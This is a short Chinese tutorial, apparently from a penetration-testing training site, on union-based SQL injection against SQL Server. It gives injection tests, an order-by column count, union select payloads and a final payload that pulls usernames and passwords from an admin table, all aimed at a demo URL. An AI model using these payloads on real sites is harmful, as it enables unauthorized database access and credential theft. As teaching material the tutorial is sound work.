1. 首页
  2. 渗透测试

[原创]WEB安全第四章SQL注入篇10 sqlserver 联合 注入

【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。

WEB安全第四章SQL注入篇10 sqlserver 联合 注入

1、简介

sqlserver经常与asp或者aspx一起使用,操作系统多数是win2012 win2018

 数据库版本 sql2008 sql2012

http://www.demo1.com/index.aspx?id=1

2、注释符号

–空格 单行注释

/*   */ 多行注释

3、判断是否注入

‘ 单引号是否报错

and 1=2

and 1=1

页面是否相同

4、判断列数

order by

http://www.demo1.com/index.aspx?id=1 order by 3

5、联合查询

联合查询 需要每个列的类型要一直 或者可以使用null 直到页面出错。

http://www.demo1.com/index.aspx?id=-1 union select 1,’2′,’3′

http://www.demo1.com/index.aspx?id=-1 union select null,null,null

6、查询系统信息

db_name() 数据库名

@@version 版本信息

User_Name() 当前用户

host_name()  计算机名称

[原创]WEB安全第四章SQL注入篇10 sqlserver 联合 注入

7、查询数据

http://www.demo1.com/index.aspx?id=-1 union select null,username,password from admin

[原创]WEB安全第四章SQL注入篇10 sqlserver 联合 注入

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/147.html

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息